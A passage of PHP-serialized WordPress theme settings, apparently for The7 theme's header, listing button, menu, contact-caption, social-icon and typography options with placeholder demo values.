100%\";s:37:\"header-elements-button-1-border-color\";s:6:\"accent\";s:42:\"header-elements-button-1-border-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-1-border_radius\";s:3:\"0px\";s:37:\"header-elements-button-1-border_width\";s:3:\"1px\";s:36:\"header-elements-button-1-choose-icon\";s:0:\"\";s:44:\"header-elements-button-1-first-header-switch\";s:9:\"near_logo\";s:33:\"header-elements-button-1-hover-bg\";s:6:\"accent\";s:39:\"header-elements-button-1-hover-bg-color\";s:7:\"#ffffff\";s:42:\"header-elements-button-1-hover-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:43:\"header-elements-button-1-hover-border-color\";s:6:\"accent\";s:48:\"header-elements-button-1-hover-border-color-mono\";s:7:\"#ffffff\";s:41:\"header-elements-button-1-hover-icon-color\";s:5:\"color\";s:50:\"header-elements-button-1-hover-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:46:\"header-elements-button-1-hover-icon-color-mono\";s:7:\"#ffffff\";s:29:\"header-elements-button-1-icon\";b:0;s:35:\"header-elements-button-1-icon-color\";s:5:\"color\";s:44:\"header-elements-button-1-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:40:\"header-elements-button-1-icon-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-1-icon-position\";s:5:\"right\";s:34:\"header-elements-button-1-icon-size\";s:2:\"14\";s:33:\"header-elements-button-1-icon_gap\";s:3:\"5px\";s:29:\"header-elements-button-1-name\";s:6:\"Button\";s:36:\"header-elements-button-1-on-desktops\";s:4:\"show\";s:32:\"header-elements-button-1-padding\";s:19:\"10px 20px 10px 20px\";s:45:\"header-elements-button-1-second-header-switch\";s:7:\"in_menu\";s:38:\"header-elements-button-1-smooth-scroll\";b:0;s:31:\"header-elements-button-1-target\";b:0;s:35:\"header-elements-button-1-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"14\";}s:28:\"header-elements-button-1-url\";s:0:\"\";s:27:\"header-elements-button-2-bg\";s:6:\"accent\";s:33:\"header-elements-button-2-bg-color\";s:7:\"#ffffff\";s:36:\"header-elements-button-2-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:37:\"header-elements-button-2-border-color\";s:6:\"accent\";s:42:\"header-elements-button-2-border-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-2-border_radius\";s:3:\"0px\";s:37:\"header-elements-button-2-border_width\";s:3:\"1px\";s:36:\"header-elements-button-2-choose-icon\";s:0:\"\";s:44:\"header-elements-button-2-first-header-switch\";s:9:\"near_logo\";s:33:\"header-elements-button-2-hover-bg\";s:6:\"accent\";s:39:\"header-elements-button-2-hover-bg-color\";s:7:\"#ffffff\";s:42:\"header-elements-button-2-hover-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:43:\"header-elements-button-2-hover-border-color\";s:6:\"accent\";s:48:\"header-elements-button-2-hover-border-color-mono\";s:7:\"#ffffff\";s:41:\"header-elements-button-2-hover-icon-color\";s:5:\"color\";s:50:\"header-elements-button-2-hover-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:46:\"header-elements-button-2-hover-icon-color-mono\";s:7:\"#ffffff\";s:29:\"header-elements-button-2-icon\";b:0;s:35:\"header-elements-button-2-icon-color\";s:5:\"color\";s:44:\"header-elements-button-2-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:40:\"header-elements-button-2-icon-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-2-icon-position\";s:5:\"right\";s:34:\"header-elements-button-2-icon-size\";s:2:\"14\";s:33:\"header-elements-button-2-icon_gap\";s:3:\"5px\";s:29:\"header-elements-button-2-name\";s:6:\"Button\";s:36:\"header-elements-button-2-on-desktops\";s:4:\"show\";s:32:\"header-elements-button-2-padding\";s:19:\"10px 20px 10px 20px\";s:45:\"header-elements-button-2-second-header-switch\";s:7:\"in_menu\";s:38:\"header-elements-button-2-smooth-scroll\";b:0;s:31:\"header-elements-button-2-target\";b:0;s:35:\"header-elements-button-2-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"14\";}s:28:\"header-elements-button-2-url\";s:0:\"\";s:39:\"header-elements-contact-address-caption\";s:44:\"8500 Beverly Boulevard Los Angeles, CA 90048\";s:43:\"header-elements-contact-address-custom-icon\";s:25:\"the7-mw-icon-address-bold\";s:51:\"header-elements-contact-address-first-header-switch\";s:12:\"top_bar_left\";s:36:\"header-elements-contact-address-icon\";s:6:\"custom\";s:43:\"header-elements-contact-address-on-desktops\";s:4:\"show\";s:52:\"header-elements-contact-address-second-header-switch\";s:7:\"in_menu\";s:35:\"header-elements-contact-address-url\";s:0:\"\";s:37:\"header-elements-contact-clock-caption\";s:32:\"Monday – Friday 10 AM – 8 PM\";s:41:\"header-elements-contact-clock-custom-icon\";s:23:\"the7-mw-icon-clock-bold\";s:49:\"header-elements-contact-clock-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-clock-icon\";s:6:\"custom\";s:41:\"header-elements-contact-clock-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-clock-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-clock-url\";s:0:\"\";s:37:\"header-elements-contact-email-caption\";s:18:\"sales@yoursite.com\";s:41:\"header-elements-contact-email-custom-icon\";s:22:\"the7-mw-icon-mail-bold\";s:49:\"header-elements-contact-email-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-email-icon\";s:6:\"custom\";s:41:\"header-elements-contact-email-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-email-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-email-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_1-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_1-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_1-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_1-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_1-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_1-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_1-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_2-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_2-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_2-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_2-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_2-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_2-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_2-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_3-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_3-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_3-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_3-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_3-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_3-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_3-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_4-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_4-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_4-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_4-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_4-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_4-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_4-url\";s:0:\"\";s:37:\"header-elements-contact-phone-caption\";s:13:\"011 322 44 56\";s:41:\"header-elements-contact-phone-custom-icon\";s:23:\"the7-mw-icon-phone-bold\";s:49:\"header-elements-contact-phone-first-header-switch\";s:12:\"top_bar_left\";s:34:\"header-elements-contact-phone-icon\";s:6:\"custom\";s:41:\"header-elements-contact-phone-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-phone-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-phone-url\";s:0:\"\";s:37:\"header-elements-contact-skype-caption\";s:10:\"Your_Skype\";s:41:\"header-elements-contact-skype-custom-icon\";s:23:\"the7-mw-icon-skype-bold\";s:49:\"header-elements-contact-skype-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-skype-icon\";s:6:\"custom\";s:41:\"header-elements-contact-skype-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-skype-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-skype-url\";s:0:\"\";s:29:\"header-elements-login-caption\";s:5:\"Login\";s:33:\"header-elements-login-custom-icon\";s:23:\"the7-mw-icon-login-bold\";s:41:\"header-elements-login-first-header-switch\";s:9:\"near_logo\";s:26:\"header-elements-login-icon\";s:6:\"custom\";s:32:\"header-elements-login-logout_url\";s:0:\"\";s:33:\"header-elements-login-on-desktops\";s:4:\"show\";s:42:\"header-elements-login-second-header-switch\";s:7:\"in_menu\";s:25:\"header-elements-login-url\";s:23:\"https://themeforest.net\";s:36:\"header-elements-login-use_logout_url\";b:0;s:30:\"header-elements-logout-caption\";s:6:\"Logout\";s:40:\"header-elements-menu-first-header-switch\";s:9:\"near_logo\";s:25:\"header-elements-menu-icon\";s:6:\"custom\";s:32:\"header-elements-menu-on-desktops\";s:4:\"show\";s:41:\"header-elements-menu-second-header-switch\";s:6:\"hidden\";s:26:\"header-elements-menu-style\";s:8:\"dropdown\";s:39:\"header-elements-menu-style-first-switch\";s:8:\"dropdown\";s:40:\"header-elements-menu-style-second-switch\";s:8:\"dropdown\";s:41:\"header-elements-menu2-first-header-switch\";s:9:\"near_logo\";s:26:\"header-elements-menu2-icon\";s:6:\"custom\";s:33:\"header-elements-menu2-on-desktops\";s:4:\"show\";s:42:\"header-elements-menu2-second-header-switch\";s:7:\"in_menu\";s:27:\"header-elements-menu2-style\";s:8:\"dropdown\";s:40:\"header-elements-menu2-style-first-switch\";s:8:\"dropdown\";s:41:\"header-elements-menu2-style-second-switch\";s:8:\"dropdown\";s:33:\"header-elements-menu2_custom-icon\";s:31:\"the7-mw-icon-dropdown-menu-bold\";s:32:\"header-elements-menu_custom-icon\";s:31:\"the7-mw-icon-dropdown-menu-bold\";s:36:\"header-elements-near_logo-typography\";a:1:{s:11:\"font_family\";s:9:\"Open Sans\";}s:36:\"header-elements-near_menu-typography\";a:1:{s:11:\"font_family\";s:9:\"Open Sans\";}s:25:\"header-elements-search-by\";s:7:\"general\";s:30:\"header-elements-search-caption\";s:0:\"\";s:42:\"header-elements-search-first-header-switch\";s:9:\"near_logo\";s:27:\"header-elements-search-icon\";s:6:\"custom\";s:36:\"header-elements-search-input-caption\";s:22:\"Type and hit enter …\";s:34:\"header-elements-search-on-desktops\";s:4:\"show\";s:43:\"header-elements-search-second-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-search_custom-icon\";s:24:\"the7-mw-icon-search-bold\";s:25:\"header-elements-soc_icons\";a:4:{i:1;a:2:{s:4:\"icon\";s:8:\"facebook\";s:3:\"url\";s:1:\"/\";}i:2;a:2:{s:4:\"icon\";s:7:\"twitter\";s:3:\"url\";s:1:\"/\";}i:3;a:2:{s:4:\"icon\";s:9:\"instagram\";s:3:\"url\";s:1:\"/\";}i:4;a:2:{s:4:\"icon\";s:8:\"you-tube\";s:3:\"url\";s:1:\"/\";}}s:28:\"header-elements-soc_icons-bg\";s:6:\"accent\";s:34:\"header-elements-soc_icons-bg-color\";s:19:\"rgba(255,255,255,1)\";s:37:\"header-elements-soc_icons-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:33:\"header-elements-soc_icons-bg-size\";s:4:\"26px\";s:32:\"header-elements-soc_icons-border\";s:8:\"disabled\";s:38:\"header-elements-soc_icons-border-color\";s:19:\"rgba(255,255,255,1)\";s:31:\"header-elements-soc_icons-color\";s:7:\"#ffffff\";s:45:\"header-elements-soc_icons-first-header-switch\";s:13:\"top_bar_right\";s:34:\"header-elements-soc_icons-hover-bg\";s:5:\"color\";s:40:\"header-elements-soc_icons-hover-bg-color\";s:19:\"rgba(108,169,242,1)\";s:43:\"header-elements-soc_icons-hover-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:38:\"header-elements-soc_icons-hover-border\";s:8:\"disabled\";s:44:\"header-elements-soc_icons-hover-border-color\";s:19:\"rgba(255,255,255,1)\";s:37:\"header-elements-soc_icons-hover-color\";s:7:\"#ffffff\";s:37:\"header-elements-soc_icons-on-desktops\";s:4:\"show\";s:46:\"header-elements-soc_icons-second-header-switch\";s:7:\"in_menu\";s:30:\"header-elements-soc_icons-size\";s:4:\"16px\";s:39:\"header-elements-soc_icons_border_radius\";s:5:\"100px\";s:38:\"header-elements-soc_icons_border_width\";s:3:\"0px\";s:29:\"header-elements-soc_icons_gap\";i:4;s:20:\"header-elements-text\";s:35:\"Some call to action text goes here!\";s:22:\"header-elements-text-2\";s:35:\"Some call to action text goes here!\";s:42:\"header-elements-text-2-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-2-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-2-second-header-switch\";s:7:\"in_menu\";s:22:\"header-elements-text-3\";s:35:\"Some call to action text goes here!\";s:42:\"header-elements-text-3-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-3-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-3-second-header-switch\";s:7:\"in_menu\";s:22:\"header-elements-text-4\";s:0:\"\";s:42:\"header-elements-text-4-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-4-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-4-second-header-switch\";s:7:\"in_menu\";s:22:\"header-elements-text-5\";s:0:\"\";s:42:\"header-elements-text-5-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-text-5-on-desktops\";s:4:\"show\";s:43:\"header-elements-text-5-second-header-switch\";s:7:\"in_menu\";s:40:\"header-elements-text-first-header-switch\";s:9:\"near_logo\";s:32:\"header-elements-text-on-desktops\";s:4:\"show\";s:41:\"header-elements-text-second-header-switch\";s:7:\"in_menu\";s:40:\"header-floating-mobile-first_switch-logo\";s:7:\"desktop\";s:41:\"header-floating-mobile-second_switch-logo\";s:7:\"desktop\";s:33:\"header-floating_microwidgets-font\";s:7:\"default\";s:39:\"header-floating_microwidgets-font-color\";s:7:\"#ffffff\";s:33:\"header-floating_microwidgets-icon\";s:7:\"default\";s:39:\"header-floating_microwidgets-icon-color\";s:7:\"#ffffff\";s:49:\"header-floating_navigation-active_item-font-color\";s:7:\"#ffffff\";s:52:\"header-floating_navigation-active_item-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:35:\"header-floating_navigation-bg-color\";s:7:\"#4169e1\";s:35:\"header-floating_navigation-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:43:\"header-floating_navigation-bg-is_fullscreen\";b:0;s:37:\"header-floating_navigation-decoration\";s:6:\"shadow\";s:43:\"header-floating_navigation-decoration-color\";s:17:\"rgba(221,51,51,1)\";s:47:\"header-floating_navigation-decoration-line_size\";s:3:\"1px\";s:38:\"header-floating_navigation-font-active\";s:7:\"default\";s:37:\"header-floating_navigation-font-color\";s:7:\"#ffffff\";s:37:\"header-floating_navigation-font-hover\";s:7:\"default\";s:38:\"header-floating_navigation-font-normal\";s:7:\"default\";s:33:\"header-floating_navigation-height\";s:4:\"60px\";s:43:\"header-floating_navigation-hover-font-color\";s:7:\"#ffffff\";s:46:\"header-floating_navigation-hover-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:37:\"header-floating_navigation-show_after\";s:5:\"150px\";s:32:\"header-floating_navigation-style\";s:5:\"slide\";s:34:\"header-floating_navigation-top-bar\";b:0;s:22:\"header-inline-elements\";a:3:{s:12:\"top_bar_left\";a:2:{i:0;s:5:\"phone\";i:1;s:13:\"working_hours\";}s:13:\"top_bar_right\";a:1:{i:0;s:12:\"social_icons\";}s:15:\"near_menu_right\";a:1:{i:0;s:6:\"search\";}}s:50:\"header-inline-elements-near_menu-custom-icon-color\";s:0:\"\";s:49:\"header-inline-elements-near_menu-custom-icon-size\";s:2:\"16\";s:43:\"header-inline-elements-near_menu-font_color\";s:7:\"#333333\";s:43:\"header-inline-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"13\";}s:46:\"header-inline-elements-near_menu_right-padding\";s:16:\"0px 0px 0px 10px\";s:20:\"header-inline-height\";s:5:\"200px\";s:26:\"header-inline-is_fullwidth\";s:1:\"0\";s:27:\"header-inline-menu-position\";s:5:\"right\";s:27:\"header-inline-show_elements\";s:1:\"1\";s:26:\"header-inline-side-padding\";s:9:\"50px 50px\";s:29:\"header-inline-switch_paddings\";s:5:\"778px\";s:29:\"header-inline_mobile_paddings\";s:9:\"20px 20px\";s:13:\"header-layout\";s:7:\"classic\";s:19:\"header-logo-padding\";s:15:\"0px 0px 0px 0px\";s:14:\"header-logo_hd\";a:2:{i:0;s:40:\"/wp-content/uploads/2022/11/mlogo-11.jpg\";i:1;i:3174;}s:19:\"header-logo_regular\";a:2:{i:0;s:40:\"/wp-content/uploads/2022/11/mlogo-11.jpg\";i:1;i:3174;}s:32:\"header-mega-menu-desc-font-color\";s:7:\"#333333\";s:32:\"header-mega-menu-desc-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"13\";}s:30:\"header-mega-menu-items-padding\";s:17:\"9px 10px 9px 10px\";s:40:\"header-mega-menu-submenu-2-level-spacing\";s:3:\"0px\";s:35:\"header-mega-menu-submenu-bg-padding\";s:19:\"20px 10px 20px 10px\";s:39:\"header-mega-menu-submenu-column-padding\";s:17:\"0px 10px 0px 10px\";s:37:\"header-mega-menu-submenu-column-width\";s:5:\"260px\";s:45:\"header-mega-menu-title-active_item-font-color\";s:7:\"#000000\";s:51:\"header-mega-menu-title-active_item-font-color-style\";s:5:\"color\";s:48:\"header-mega-menu-title-active_item-font-gradient\";s:30:\"90deg|#8224e3 30%|#eeee22 100%\";s:33:\"header-mega-menu-title-font-color\";s:7:\"#333333\";s:39:\"header-mega-menu-title-hover-font-color\";s:7:\"#000000\";s:45:\"header-mega-menu-title-hover-font-color-style\";s:5:\"color\";s:42:\"header-mega-menu-title-hover-font-gradient\";s:29:\"90deg|#1e73be 30%|#eeee22 99%\";s:32:\"header-mega-menu-title-icon-size\";s:2:\"16\";s:33:\"header-mega-menu-title-typography\";a:3:{s:11:\"font_family\";s:8:\"Aleo:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:36:\"header-mega-menu-widget-accent-color\";s:0:\"\";s:34:\"header-mega-menu-widget-font-color\";s:7:\"#333333\";s:35:\"header-mega-menu-widget-title-color\";s:7:\"#333333\";s:34:\"header-menu-active_item-font-color\";s:7:\"#000000\";s:40:\"header-menu-active_item-font-color-style\";s:5:\"color\";s:37:\"header-menu-active_item-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:30:\"header-menu-close_icon-caption\";s:8:\"disabled\";s:35:\"header-menu-close_icon-caption-text\";s:10:\"Navigation\";s:41:\"header-menu-close_icon-caption-typography\";a:3:{s:11:\"font_family\";s:5:\"Arial\";s:14:\"text_transform\";s:9:\"uppercase\";s:9:\"font_size\";s:2:\"16\";}s:34:\"header-menu-close_icon-caption_gap\";s:4:\"20px\";s:31:\"header-menu-close_icon-position\";s:7:\"outside\";s:27:\"header-menu-close_icon-size\";s:11:\"fade_medium\";s:41:\"header-menu-decoration-other-active-color\";s:19:\"rgba(255,255,255,1)\";s:47:\"header-menu-decoration-other-active-color-style\";s:6:\"accent\";s:44:\"header-menu-decoration-other-active-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:40:\"header-menu-decoration-other-active-line\";s:1:\"0\";s:46:\"header-menu-decoration-other-active-line-color\";s:20:\"rgba(130,36,227,0.3)\";s:52:\"header-menu-decoration-other-active-line-color-style\";s:5:\"color\";s:49:\"header-menu-decoration-other-active-line-gradient\";s:56:\"135deg|rgba(221,51,51,0.3) 30%|rgba(129,215,66,0.3) 100%\";s:48:\"header-menu-decoration-other-active-line-opacity\";s:2:\"30\";s:43:\"header-menu-decoration-other-active-opacity\";s:3:\"100\";s:41:\"header-menu-decoration-other-active-style\";s:10:\"background\";s:42:\"header-menu-decoration-other-border-radius\";s:1:\"4\";s:40:\"header-menu-decoration-other-hover-color\";s:17:\"rgba(221,51,51,1)\";s:46:\"header-menu-decoration-other-hover-color-style\";s:5:\"color\";s:43:\"header-menu-decoration-other-hover-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:39:\"header-menu-decoration-other-hover-line\";s:1:\"0\";s:45:\"header-menu-decoration-other-hover-line-color\";s:20:\"rgba(221,51,51,0.23)\";s:51:\"header-menu-decoration-other-hover-line-color-style\";s:8:\"gradient\";s:48:\"header-menu-decoration-other-hover-line-gradient\";s:55:\"135deg|rgba(255,255,255,0.23) 30%|rgba(0,0,0,0.23) 100%\";s:47:\"header-menu-decoration-other-hover-line-opacity\";s:2:\"23\";s:40:\"header-menu-decoration-other-hover-style\";s:10:\"background\";s:38:\"header-menu-decoration-other-line_size\";s:3:\"2px\";s:47:\"header-menu-decoration-other-links-is_justified\";s:1:\"0\";s:36:\"header-menu-decoration-other-opacity\";s:3:\"100\";s:28:\"header-menu-decoration-style\";s:9:\"underline\";s:38:\"header-menu-decoration-underline-color\";s:7:\"#000000\";s:44:\"header-menu-decoration-underline-color-style\";s:5:\"color\";s:42:\"header-menu-decoration-underline-direction\";s:11:\"from_center\";s:41:\"header-menu-decoration-underline-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:42:\"header-menu-decoration-underline-line_size\";s:3:\"2px\";s:26:\"header-menu-dividers-color\";s:18:\"rgba(130,36,227,1)\";s:27:\"header-menu-dividers-height\";s:4:\"20px\";s:33:\"header-menu-dividers-height-style\";s:6:\"custom\";s:29:\"header-menu-dividers-surround\";s:1:\"0\";s:26:\"header-menu-dividers-width\";s:3:\"1px\";s:22:\"header-menu-font-color\";s:7:\"#ffffff\";s:28:\"header-menu-hover-font-color\";s:7:\"#000000\";s:34:\"header-menu-hover-font-color-style\";s:5:\"color\";s:31:\"header-menu-hover-font-gradient\";s:30:\"90deg|#8224e3 30%|#751257 100%\";s:21:\"header-menu-icon-size\";s:1:\"1\";s:23:\"header-menu-item-margin\";s:17:\"11px 0px 11px 0px\";s:24:\"header-menu-item-padding\";s:15:\"7px 9px 5px 9px\";s:47:\"header-menu-item-surround_margins-custom-margin\";s:4:\"15px\";s:39:\"header-menu-item-surround_margins-style\";s:7:\"regular\";s:25:\"header-menu-show_dividers\";s:1:\"0\";s:31:\"header-menu-show_next_lvl_icons\";b:0;s:35:\"header-menu-submenu-active-bg-color\";s:21:\"rgba(137,92,184,0.07)\";s:41:\"header-menu-submenu-active-bg-color-style\";s:6:\"accent\";s:38:\"header-menu-submenu-active-bg-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:37:\"header-menu-submenu-active-bg-opacity\";s:1:\"7\";s:37:\"header-menu-submenu-active-font-color\";s:7:\"#000000\";s:43:\"header-menu-submenu-active-font-color-style\";s:5:\"color\";s:40:\"header-menu-submenu-active-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:28:\"header-menu-submenu-bg-color\";s:7:\"#4169e1\";s:28:\"header-menu-submenu-bg-hover\";s:0:\"\";s:30:\"header-menu-submenu-bg-padding\";s:17:\"9px 10px 9px 10px\";s:28:\"header-menu-submenu-bg-width\";s:5:\"280px\";s:27:\"header-menu-submenu-display\";s:5:\"hover\";s:30:\"header-menu-submenu-font-color\";s:7:\"#ffffff\";s:34:\"header-menu-submenu-hover-bg-color\";s:21:\"rgba(137,92,184,0.07)\";s:40:\"header-menu-submenu-hover-bg-color-style\";s:6:\"accent\";s:37:\"header-menu-submenu-hover-bg-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:36:\"header-menu-submenu-hover-bg-opacity\";s:1:\"7\";s:36:\"header-menu-submenu-hover-font-color\";s:7:\"#000000\";s:42:\"header-menu-submenu-hover-font-color-style\";s:5:\"color\";s:39:\"header-menu-submenu-hover-font-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:29:\"header-menu-submenu-icon-size\";s:2:\"14\";s:31:\"header-menu-submenu-item-margin\";s:15:\"0px 0px 0px 0px\";s:32:\"header-menu-submenu-item-padding\";s:19:\"10px 10px 10px 10px\";s:39:\"header-menu-submenu-parent_is_clickable\";b:0;s:39:\"header-menu-submenu-show_next_lvl_icons\";b:0;s:39:\"header-menu-submenu-subtitle-typography\";a:2:{s:11:\"font_family\";s:14:\"Aleo:400italic\";s:9:\"font_size\";s:2:\"10\";}s:30:\"header-menu-submenu-typography\";a:3:{s:11:\"font_family\";s:8:\"Aleo:600\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:31:\"header-menu-subtitle-typography\";a:2:{s:11:\"font_family\";s:14:\"Aleo:400italic\";s:9:\"font_size\";s:2:\"11\";}s:22:\"header-menu-typography\";a:3:{s:11:\"font_family\";s:8:\"Aleo:600\";s:14:\"text_transform\";s:9:\"uppercase\";s:9:\"font_size\";s:2:\"12\";}s:25:\"header-menu_close_icon-bg\";s:7:\"enabled\";s:39:\"header-menu_close_icon-bg-border-radius\";s:3:\"0px\";s:38:\"header-menu_close_icon-bg-border-width\";s:3:\"0px\";s:31:\"header-menu_close_icon-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:31:\"header-menu_close_icon-bg-hover\";s:7:\"enabled\";s:29:\"header-menu_close_icon-border\";s:7:\"enabled\";s:35:\"header-menu_close_icon-border-color\";s:0:\"\";s:41:\"header-menu_close_icon-border-color-hover\";s:0:\"\";s:35:\"header-menu_close_icon-border-hover\";s:7:\"enabled\";s:36:\"header-menu_close_icon-caption_color\";s:7:\"#000000\";s:42:\"header-menu_close_icon-caption_color-hover\";s:7:\"#000000\";s:28:\"header-menu_close_icon-color\";s:7:\"#000000\";s:34:\"header-menu_close_icon-hover-color\";s:7:\"#000000\";s:29:\"header-menu_close_icon-margin\";s:19:\"30px 30px 30px 30px\";s:30:\"header-menu_close_icon-padding\";s:19:\"15px 15px 15px 15px\";s:19:\"header-menu_icon-bg\";s:7:\"enabled\";s:33:\"header-menu_icon-bg-border-radius\";s:3:\"0px\";s:32:\"header-menu_icon-bg-border-width\";s:3:\"0px\";s:25:\"header-menu_icon-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:31:\"header-menu_icon-bg-color-hover\";s:22:\"rgba(255,255,255,0.75)\";s:25:\"header-menu_icon-bg-hover\";s:7:\"enabled\";s:23:\"header-menu_icon-border\";s:7:\"enabled\";s:29:\"header-menu_icon-border-color\";s:0:\"\";s:29:\"header-menu_icon-border-hover\";s:7:\"enabled\";s:35:\"header-menu_icon-border-hover-color\";s:0:\"\";s:24:\"header-menu_icon-caption\";s:8:\"disabled\";s:32:\"header-menu_icon-caption-padding\";s:19:\"18px 15px 18px 15px\";s:29:\"header-menu_icon-caption-text\";s:4:\"Menu\";s:35:\"header-menu_icon-caption-typography\";a:3:{s:11:\"font_family\";s:5:\"Arial\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:30:\"header-menu_icon-caption_color\";s:7:\"#000000\";s:36:\"header-menu_icon-caption_color-hover\";s:7:\"#000000\";s:28:\"header-menu_icon-caption_gap\";s:4:\"10px\";s:22:\"header-menu_icon-color\";s:7:\"#000000\";s:28:\"header-menu_icon-color-hover\";s:7:\"#000000\";s:25:\"header-menu_icon-elements\";a:1:{s:10:\"below_menu\";a:3:{i:0;s:12:\"social_icons\";i:1;s:6:\"search\";i:2;s:5:\"phone\";}}s:44:\"header-menu_icon-elements-below_menu-padding\";s:16:\"30px 0px 0px 0px\";s:53:\"header-menu_icon-elements-near_menu-custom-icon-color\";s:0:\"\";s:52:\"header-menu_icon-elements-near_menu-custom-icon-size\";s:2:\"16\";s:46:\"header-menu_icon-elements-near_menu-font_color\";s:7:\"#333333\";s:46:\"header-menu_icon-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"14\";}s:31:\"header-menu_icon-hover-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:28:\"header-menu_icon-hover-color\";s:7:\"#333333\";s:23:\"header-menu_icon-margin\";s:15:\"0px 0px 0px 0px\";s:30:\"header-menu_icon-show_elements\";s:1:\"1\";s:21:\"header-menu_icon-size\";s:6:\"medium\";s:21:\"header-mixed-bg-color\";s:19:\"rgba(255,255,255,1)\";s:23:\"header-mixed-decoration\";s:6:\"shadow\";s:29:\"header-mixed-decoration-color\";s:18:\"rgba(221,153,51,1)\";s:28:\"header-mixed-decoration_size\";s:3:\"1px\";s:29:\"header-mixed-floating-top-bar\";b:0;s:28:\"header-mixed-sticky-bg-color\";s:7:\"#000000\";s:29:\"header-mobile-content-padding\";s:19:\"45px 15px 30px 